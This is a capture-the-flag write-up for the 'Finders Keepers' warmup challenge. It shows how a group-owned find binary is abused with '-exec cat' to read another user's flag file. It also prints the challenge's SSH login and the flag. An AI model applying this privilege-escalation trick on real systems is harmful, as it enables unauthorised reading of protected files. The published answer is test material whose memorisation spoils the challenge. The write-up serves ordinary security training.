FetchTheFlag CTF 2023-Warmup-FindersKeepers

Finders Keepers

Description

^{Author: @JohnHammond}
Patch found a flag! He stored it in his home directory… should be able to keep it?

Press the Start button in the top-right to begin this challenge.
Connect with:
Password is "userpass"
ssh -p 31380 user@challenge.ctf.games

Solution

1. connect ssh ssh -p 31380 user@challenge.ctf.games with "userpass" password.
   user@finders-keepers-b930cde70263f2f9-58d4447d9d-zwqt7:~$
2. According to the description, There is a flag in patch/ home directory. So I need to find commands that’s in 'patch' group to access files inside.

   user@finders-keepers-b930cde70263f2f9-58d4447d9d-zwqt7:~$ find / -group patch -type f 2>/dev/null
   /usr/bin/find
   /home/patch/.bash_logout
   /home/patch/.profile
   /home/patch/.bashrc
   /home/patch/flag.txt
   

3. I found find command that can access flag.txt. I run this command to read flag.txt.

   user@finders-keepers-b930cde70263f2f9-58d4447d9d-zwqt7:~$ find . -exec /bin/cat /home/patch/flag.txt \;
   flag{e4bd38e78379a5a0b29f047b91598add}
   

Flag: flag{e4bd38e78379a5a0b29f047b91598add}